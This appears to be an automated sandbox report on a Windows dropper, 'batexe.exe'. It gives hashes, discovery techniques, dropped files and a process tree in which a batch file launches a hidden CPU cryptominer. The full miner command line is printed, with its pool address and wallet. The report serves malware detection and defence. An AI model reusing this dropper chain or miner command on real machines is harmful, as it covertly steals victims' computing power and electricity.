73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
297s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 05:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4832	b2e.exe
5376	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5376	cpuminer-sse2.exe
5376	cpuminer-sse2.exe
5376	cpuminer-sse2.exe
5376	cpuminer-sse2.exe
5376	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5496-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5496 wrote to memory of 4832	5496	batexe.exe	84
PID 5496 wrote to memory of 4832	5496	batexe.exe	84
PID 5496 wrote to memory of 4832	5496	batexe.exe	84
PID 4832 wrote to memory of 1208	4832	b2e.exe	85
PID 4832 wrote to memory of 1208	4832	b2e.exe	85
PID 4832 wrote to memory of 1208	4832	b2e.exe	85
PID 1208 wrote to memory of 5376	1208	cmd.exe	88
PID 1208 wrote to memory of 5376	1208	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5496
- C:\Users\Admin\AppData\Local\Temp\5B01.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5B01.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5B01.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5D62.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1208
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5B01.tmp\b2e.exe

Filesize
2.7MB

MD5
223ca28b944e61d5614116ebe38b6a38

SHA1
ffaae0091eee16bfb699f732e9bbc0eec0a6a470

SHA256
6d81c6a18a6f4f2fe0d2a72bb75225d86aaaadfa34f8f9ed1b641fb2fb0fdc2e

SHA512
3eaa0afb5c68eb6c0dcdba85663a2916af4e4cbe10f079b9363a1a47f8befaa25ad1132ea7cc74f6410b4748af409d9a6cdbcd9ffd73d892b0c87caeebb61762

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B01.tmp\b2e.exe

Filesize
802KB

MD5
92247c261edd1345d10a713a2a697b88

SHA1
6f092c080ef03e29f6739e527e7bf9af82085c6f

SHA256
332c7fb71f479fc6c6e2652432788d1ee5efc7116b6e57e26aed4b8ddc503c14

SHA512
a924fb1fa280f82bf7628e55fa17f5b65f33aa1909a3af57bea9a6a93754c8eb5f6383a2225e0f18f73ae2c24ece9a29ead633d481c86f203f3b77385764780e

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B01.tmp\b2e.exe

Filesize
799KB

MD5
f046b1713383116026ae1343d9c741e4

SHA1
5aa8682cc696eb4a9b8a0e787200706330dcd882

SHA256
fcfdf0f35ac14a47e23aae761e8e38ce3b69ee76876dfa2962b13236662ea65e

SHA512
491c757f7134eefea4c6c38c5c3f850fcee94e480a4b7e036fed0928f4ddf003163141d77ecf2491b4e5c922b905649fc4ad4521bd3ac2cb2a1b443b7863a5ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\5D62.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
284KB

MD5
4d74fb4148d32eebfdb2c187b3ce6734

SHA1
2c31dc92df197a5a625423106124669ef90c772c

SHA256
789f577a9a69f70e0afc933bbe6a5155fd20cbadb8f817f91411e9b15a6b1705

SHA512
5863585376d71583b569c07125a19b3437df4a4fc24178473158339aee9bf4456993f079dd6dfb4a7f53e37ddccb9167832f414964ff04c14f145145ca321b91

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
145KB

MD5
165e6f8269c08bfc10ab705266b966d5

SHA1
ba637ee7a299b42756f149c49210ae8d2433f54f

SHA256
46121bb7be9e239144845029fe440ec63fa62187120e68657a8d733e8652ac09

SHA512
85e28d0195dc61541e21e2e93e3bc18e8958dbc27809fbdb2b9d5b5776e26cc666a752d33ba808868ac1e1a8e68373420b12d099377e414b586eaaf705f622f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
267KB

MD5
e677f77d505007eedb34b72cd6532a71

SHA1
b4dd46ba2c55169fc96d6bfa98212dc6cf3dd66e

SHA256
a618b1799965cb1d992032b6a1d2cfe0c66d01676ed468f74e509d94e693ab76

SHA512
64ad9ec12a657545b206498822b4f7c391a03200b3357f3df5f2a95fdbd7b09ad499cc08b9d42e1df699a30720f25a60dbbd7e1a161fa9d9452dd09f138238df

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
149KB

MD5
7635d4f6569224e241d1262eb987a832

SHA1
543e3300747ac247a53c08b8d449c28a57f8448e

SHA256
bb56037a9dc2298712acd04aadbb2988941511a7ae23e53669df707e245fcd45

SHA512
1923c648f4c53fda55bbc30f954ec7eef99e2f963520fd1e286415e02688e6771d7611a4d9a5ad2e02604e94506d54bb5e4d2ebc12c2a144b3ae5ae096bc0b65

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
87KB

MD5
0a8fbc46c9b63196162a459e0713ae4b

SHA1
0e71a9ae41e24188b174c4d74817583db4d135c0

SHA256
f7869dc2ff2d5bcc81d132feebf2647326d839dacc5f05a06d4481f53478062d

SHA512
a3526bad198039776442a713ea094ccd01016a7f236e79f0a32ce969897dfb589b9a8cb1fc9ec8d86ccacdb0ffca79d9cdc0ca25a1c5f4822ba013080e905a0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
139KB

MD5
204240bf05c87f5956e37fd7d784e7fe

SHA1
d9d8d4c3dfa898d576ee85d39048df13dc539d3b

SHA256
cbd2d9328a769d50359e8fbad21e73a131bcb0e6cc134a0fc2d5446534b94ef0

SHA512
8cf9c523ca2c8a04834850e99ac215749481145d45cc13af15574c4480c709b53a82fb3d2f43456904e9d6c86169e72c56cb34ac99f25f99fc1e1ae96b90f332

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
239KB

MD5
16fe46627042ddf0b6146ba2760421c8

SHA1
0fe3b9769596c0c4d5ce4ba4e35edd741663202b

SHA256
efed904314a28cc7608694f1777512bf6e16a0053101d72eac44c9758f4ce435

SHA512
ca8083c45509ed3069d8c57d84566f5a5691d16729a6475482d3bb9251b5d8a2d79d39e01889431593488e94c773e406f715469fbb49d790f09703e68a2b6341

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
104KB

MD5
7ae7ed1947a75b893fc862ad346d3e48

SHA1
56c54a8d821336c1e23d18b02bfeea44c26e5ae5

SHA256
ea91f4c34e13491a196a523b7ec5358014e476046b07e8da6c8f305591d45ac4

SHA512
6e5f2518970201dcda1d772932a842e1e09404ffd6cea4799447aa8d2b19e58c9114d1bfe6e9ad6270e2042d2ec5b2bb162e260384da5c7dda0587d97c7be688

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
16KB

MD5
5d84af3b2c03e8470e833cf9d3062cd7

SHA1
f059489ddb261753efca33ff83c6994379ef9cc9

SHA256
ea20da27aaf64a29217592e4079903f08f71895c933bd637746bcb2d59988a4d

SHA512
3b7b8efa7d6f9ea587970a0d2893aa032874dd99bbceded3837ce5a5c2e21040cacb16e712edc122fca5eee093d9bc29d8de5a230e6ad444119178a9115f0426

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
156KB

MD5
c59e4130df15c4241d54222b807e5e64

SHA1
aeade3d44917e1e4708301f21a3bce8309b54988

SHA256
0b3045b3f24d79e32a4ad61b9e13269b3219d804255ddb0dcab6a7d8a47a43b3

SHA512
2520837af56639cec3a81d785f964e9b56631ba663c67d64de3c6dad62cd2951bbdd9bbea1f4e8114723f4473fba557701106adfd744c2f9c844ce226940332a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
143KB

MD5
d1562692727cc68b09fedec58a0f7401

SHA1
7aad6722a0155b475c68de94bb5e92d65cb96c1d

SHA256
1ef0962898bf8d624d0e09898031ff9f8ebce060bee82445e9c75599073dd273

SHA512
3bbbb1dd9a032ba133a2ef6ccc1f295ee6af308e7720ce44d97f91b76ed9d8b6eaf37508469ee154e3e0fdd57c1e79ac84cbb10d04c99b2d94593de0e3f63d08

Download Submit
memory/4832-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4832-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5376-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/5376-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5376-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5376-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5376-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5376-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5376-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5376-46-0x0000000064990000-0x0000000064A28000-memory.dmp

Filesize
608KB

Download
memory/5376-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5376-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5376-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5376-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5376-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5376-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5496-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download